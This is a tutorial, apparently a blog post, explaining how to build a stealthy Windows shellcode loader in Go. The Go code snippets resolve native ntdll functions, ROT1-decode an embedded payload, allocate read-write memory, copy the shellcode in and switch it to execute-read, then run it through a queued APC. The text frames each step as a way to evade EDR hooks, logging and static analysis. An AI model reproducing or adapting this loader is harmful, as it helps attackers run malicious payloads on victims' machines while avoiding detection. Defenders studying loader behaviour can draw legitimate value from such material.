Low-level APIs, APC, and Memory Protection Techniques

Introduction

In this article, I look at several ways to make a program's execution flow stealthier. These concepts are already well documented, so I only briefly cover the basics of APCs, low-level APIs, and memory protection management.

Why Use Low-Level APIs Instead of the Windows "Basic" API?

Traditional malware relies on the Windows "user" API for operations like memory allocation, code execution, and threading. However, modern defensive solutions, such as Endpoint Detection and Response (EDR) systems, monitor these APIs extensively. API hooks, logging, and behavioral analysis are common detection mechanisms employed by these tools.

Low-level (native) APIs skip the Windows "user" API layer: the Nt* functions exported by ntdll.dll are thin user-mode stubs that transition into the kernel. Calling them directly reduces observable traces, without eliminating them entirely of course. The goals of this approach are:

Fewer API hooks: Many monitoring tools hook the higher-level user-mode APIs, a layer that native API calls skip. Hooks placed inside ntdll.dll itself still see these calls.
Less logging: Native API calls do not pass through higher-level libraries such as kernel32.dll in the same way, so they avoid some of the log entries recorded at that layer.

The code uses low-level APIs for memory allocation, protection changes, and APC queuing through NtAllocateVirtualMemory, NtProtectVirtualMemory, and NtQueueApcThread.

What Is an APC and Why Is It Superior for Execution?

Asynchronous Procedure Calls (APC) provide a mechanism for executing code asynchronously in the context of an existing thread. In malware development, APC is a stealthy alternative to creating new threads for execution. Here’s why:

Blends into Normal Behavior: APC execution is a common Windows feature, reducing anomalies in thread activity.
Minimizes New Thread Creation: Creating new threads can trigger behavioral detection mechanisms.
Flexible Timing: APCs execute when the target thread enters an alertable state, offering precise timing control.

In this example, APC is used to queue the shellcode for execution in the context of the current thread, ensuring minimal deviation from legitimate thread activity.

Why Use a "Two-Step" Memory Allocation?

Allocating memory that is executable from the start (that is, allocating it directly with PAGE_EXECUTE_READWRITE) is a well-known red flag for modern defensive systems. Instead, malware can mimic legitimate application behavior by:

Allocating memory with PAGE_READWRITE.
Writing the shellcode into memory.
Changing the memory protection to PAGE_EXECUTE_READ.

This multi-step approach reduces detection risks by avoiding suspicious memory allocation patterns. Defensive tools often look for directly executable memory regions as indicators of malicious activity. Transitioning permissions after writing the payload mirrors the behavior of legitimate applications.
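To make the three protection values above concrete, here is a minimal sketch that only describes them. The numeric values are the documented Windows memory protection constants; the helpers `describe` and `writableAndExecutable` are hypothetical names introduced for illustration and are not part of the article's code.

```go
package main

import "fmt"

// Documented Windows memory protection constants.
const (
	PAGE_READWRITE         = 0x04
	PAGE_EXECUTE_READ      = 0x20
	PAGE_EXECUTE_READWRITE = 0x40
)

// describe is a hypothetical helper that names the access a protection value grants.
func describe(protect uint32) string {
	switch protect {
	case PAGE_READWRITE:
		return "read/write, not executable"
	case PAGE_EXECUTE_READ:
		return "read/execute, not writable"
	case PAGE_EXECUTE_READWRITE:
		return "read/write/execute"
	default:
		return "not covered by this sketch"
	}
}

// writableAndExecutable reports whether a region would be both writable and
// executable at the same time, the pattern the text calls a red flag.
func writableAndExecutable(protect uint32) bool {
	return protect == PAGE_EXECUTE_READWRITE
}

func main() {
	for _, p := range []uint32{PAGE_READWRITE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE} {
		fmt.Printf("0x%02X: %s (W+X: %v)\n", p, describe(p), writableAndExecutable(p))
	}
}
```

In the two-step sequence, the region is never in the third state: it is writable first and executable afterwards, but not both at once.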

Step-by-step breakdown

Here’s a detailed explanation of the Go code’s key components, focusing on syscall usage, memory operations, and APC execution.

1. Loading Libraries and Resolving Syscalls

var (
    ntdll                   = syscall.NewLazyDLL("ntdll.dll")
    ntAllocateVirtualMemory = ntdll.NewProc("NtAllocateVirtualMemory")
    ntProtectVirtualMemory  = ntdll.NewProc("NtProtectVirtualMemory")
    ntQueueApcThread        = ntdll.NewProc("NtQueueApcThread")
    kernel32                = syscall.NewLazyDLL("kernel32.dll")
    openThread              = kernel32.NewProc("OpenThread")
    sleepEx                 = kernel32.NewProc("SleepEx")
    getCurrentThreadId      = kernel32.NewProc("GetCurrentThreadId")
)

The code lazily loads ntdll.dll and kernel32.dll and resolves the required functions by name. This keeps the code portable and adaptable, although it remains relatively high-level: these are calls to exported library functions, not direct syscalls.

2. Decrypting the Shellcode

func rot1Decrypt(input []byte) []byte {
    decrypted := make([]byte, len(input))
    for i, b := range input {
        decrypted[i] = b - 1
    }
    return decrypted
}

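The shellcode is stored encoded with a simple ROT1 scheme (every byte shifted by one) and decoded at runtime. This is light obfuscation rather than real encryption: it keeps the raw payload bytes out of the binary during static analysis, adding a small layer of stealth.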

3. Opening the Current Thread

threadID, _, _ := getCurrentThreadId.Call()
thread, _, err := openThread.Call(THREAD_SET_CONTEXT, 0, threadID)
if thread == 0 {
    panic(fmt.Sprintf("OpenThread failed: %v", err))
}
fmt.Printf("Opened thread with handle: 0x%x\n", thread)

The malware retrieves the current thread's ID and opens a handle to it with THREAD_SET_CONTEXT, the access right needed to queue an APC to a thread. This step is critical for queuing the APC that will execute the shellcode.

4. Allocating Memory

var baseAddress uintptr
size := uintptr(len(data))
ntStatus, _, _ := ntAllocateVirtualMemory.Call(
    uintptr(proc),
    uintptr(unsafe.Pointer(&baseAddress)),
    0,
    uintptr(unsafe.Pointer(&size)),
    MEM_COMMIT|MEM_RESERVE,
    PAGE_READWRITE,
)
if ntStatus != STATUS_SUCCESS {
    panic(fmt.Sprintf("NtAllocateVirtualMemory failed with status: 0x%x", ntStatus))
}
fmt.Printf("Memory allocated at: 0x%x\n", baseAddress)

Memory is allocated using NtAllocateVirtualMemory with PAGE_READWRITE permissions, ensuring that the initial allocation avoids detection triggers.
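The snippet above treats any value other than STATUS_SUCCESS as a failure. For reference, here is a small sketch of how NTSTATUS values are conventionally interpreted: the check in `ntSuccess` mirrors the NT_SUCCESS macro from the Windows headers, and the top two bits encode the severity. Both helper names are hypothetical and are not part of the article's code.

```go
package main

import "fmt"

// ntSuccess mirrors the NT_SUCCESS macro: read as a signed 32-bit value,
// a status >= 0 is a success or informational code.
func ntSuccess(status uintptr) bool {
	return int32(uint32(status)) >= 0
}

// severity decodes the top two bits of an NTSTATUS value.
func severity(status uintptr) string {
	switch uint32(status) >> 30 {
	case 0:
		return "success"
	case 1:
		return "informational"
	case 2:
		return "warning"
	default:
		return "error"
	}
}

func main() {
	// 0x00000000 is STATUS_SUCCESS, 0x80000005 is STATUS_BUFFER_OVERFLOW,
	// 0xC0000005 is STATUS_ACCESS_VIOLATION.
	for _, s := range []uintptr{0x00000000, 0x80000005, 0xC0000005} {
		fmt.Printf("0x%08X success=%v severity=%s\n", s, ntSuccess(s), severity(s))
	}
}
```

Comparing against STATUS_SUCCESS, as the article does, is the stricter of the two checks.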

5. Writing the Shellcode

for i, b := range data {
    *(*byte)(unsafe.Pointer(baseAddress + uintptr(i))) = b
}
fmt.Println("Shellcode written to memory")

The decrypted shellcode is written into the allocated memory space. This step ensures the payload is ready for execution.

6. Changing Memory Protection

oldProtect := PAGE_READWRITE
ntStatus, _, _ = ntProtectVirtualMemory.Call(
    uintptr(proc),
    uintptr(unsafe.Pointer(&baseAddress)),
    uintptr(unsafe.Pointer(&size)),
    PAGE_EXECUTE_READ,
    uintptr(unsafe.Pointer(&oldProtect)),
)
if ntStatus != STATUS_SUCCESS {
    panic(fmt.Sprintf("NtProtectVirtualMemory failed with status: 0x%x", ntStatus))
}
fmt.Println("Memory protection changed to PAGE_EXECUTE_READ")

Once the shellcode is in memory, NtProtectVirtualMemory changes the protection to PAGE_EXECUTE_READ, mimicking legitimate behavior.

7. Queueing an APC

ntStatus, _, _ = ntQueueApcThread.Call(
    thread,
    baseAddress,
    0,
    0,
    0,
)
if ntStatus != STATUS_SUCCESS {
    panic(fmt.Sprintf("NtQueueApcThread failed with status: 0x%x", ntStatus))
}
fmt.Println("APC queued successfully")

An APC is queued to the opened thread, pointing to the allocated shellcode. This step ensures execution within the thread context.

8. Triggering APC Execution

sleepEx.Call(0, 1) // SleepEx(0, TRUE) puts the thread in an alertable state, triggering the APC

Calling SleepEx with its second argument (bAlertable) set to TRUE puts the thread into an alertable state, which lets the queued APC run and execute the shellcode.

Conclusion

In this article, we used stealthier methods than those described previously: low-level APIs, APCs, and multi-step memory management. By walking through these methods step by step, we showed how a program can look more benign.

Note that this code is still high-level and not strong enough to stand up to advanced security solutions like EDRs... 👀

The full code is available here
